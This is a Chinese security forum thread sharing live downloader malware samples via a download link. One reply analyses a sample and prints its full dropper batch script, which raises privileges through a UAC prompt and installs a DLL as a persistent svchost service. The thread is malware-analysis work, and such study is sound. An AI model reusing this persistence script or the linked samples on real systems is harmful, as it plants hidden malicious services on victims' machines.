收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 谁能帮我提取这些下载器的配置文件
返回列表 发新帖
查看: 583|回复: 2
收起左侧

[病毒样本] 谁能帮我提取这些下载器的配置文件

[复制链接]
adware
发表于 2024-1-11 15:27:10 来自手机 | 显示全部楼层 |阅读模式
本帖最后由 adware 于 2024-1-11 15:40 编辑

https://www.123pan.com/s/FxRKVv-DJf6d.html  提取码:WFjf
样本无密码
帮我提取这些下载器的配置文件谢谢了我不知道怎么提取配置文件像图片中的一样

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

祸兮福所倚
头像被屏蔽
发表于 2024-1-11 15:36:40 | 显示全部楼层
下载以后小A360双杀,都是不等下载完就杀了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

DisaPDB
发表于 2024-1-11 16:01:28 | 显示全部楼层
本帖最后由 DisaPDB 于 2024-1-11 16:13 编辑

10b9d7ea6c2b261ebb029d559c5314ac0f0b507af43baba32080cd0aeee2f7aa.exe是自解压文件
Downloader内含有.bat,内容如下:
复制自解压包内的prsstt.dll 到用户Appdata目录,然后创建一个名为 QQQRRR 的服务并启动它实现持久化
剩下几个帮不了你
  1. [url=home.php?mod=space&uid=331734]@echo[/url] OFF & CD /D "%~DP0"
  2. >NUL 2>&1 reg.exe query "HKU\S-1-5-19" || (
  3.     ECHO SET UAC = CreateObject^("Shell.Application"^) > "%TEMP%\Getadmin.vbs"
  4.     ECHO UAC.ShellExecute "%~f0", "%1", "", "runas", 1 >> "%TEMP%\Getadmin.vbs"
  5.     "%TEMP%\Getadmin.vbs"
  6.     DEL /f /q "%TEMP%\Getadmin.vbs" 2>NUL
  7.     Exit /b
  8. )
  9. cd /d "%~dp0"
  10. echo y|xcopy prsstt.dll "%localappdata%\jjjjjj"
  11. sc create QQQRRR binpath= "%SystemRoot%\System32\svchost.exe -k QQQRRREX" start= auto type= own
  12. reg add HKLM\SYSTEM\CurrentControlSet\Services\QQQRRR /v WOW64 /t reg_dword /d 1 /f
  13. reg add HKLM\SYSTEM\CurrentControlSet\Services\QQQRRR\Parameters /v ServiceDll /t reg_expand_sz /d "%localappdata%\jjjjjj\prsstt.dll" /f
  14. reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Svchost" /v QQQRRREX /t reg_multi_sz /d "QQQRRR" /f
  15. sc config QQQRRR start= auto
  16. sc start QQQRRR
复制代码
4fefdcdf7cc5ef4f25c5edcf2054e34eb21a62ce6d38b0b03e9fd07fd59abfbf.exe

  2. 1 VERSIONINFO
  3. FILEVERSION 3,2,0,8
  4. PRODUCTVERSION 3,2,0,8
  5. FILEOS 0x40004
  6. FILETYPE 0x1
  7. {
  8. BLOCK "StringFileInfo"
  9. {
  10.         BLOCK "080404b0"
  11.         {
  12.                 VALUE "CompanyName", "-"
  13.                 VALUE "FileDescription", " "
  14.                 VALUE "FileVersion", "3.2.0.8"
  15.                 VALUE "InternalName", "FastDownloader.exe"
  16.                 VALUE "LegalCopyright", "Copyright (C) 2018"
  17.                 VALUE "OriginalFilename", "FastDownloader.exe"
  18.                 VALUE "ProductName", "软件下载器"
  19.                 VALUE "ProductVersion", "3.2.0.8"
  20.         }
  21. }

  23. BLOCK "VarFileInfo"
  24. {
  25.         VALUE "Translation", 0x0804 0x04B0  
  26. }
  27. }
复制代码


回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-9 04:14 , Processed in 0.119895 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表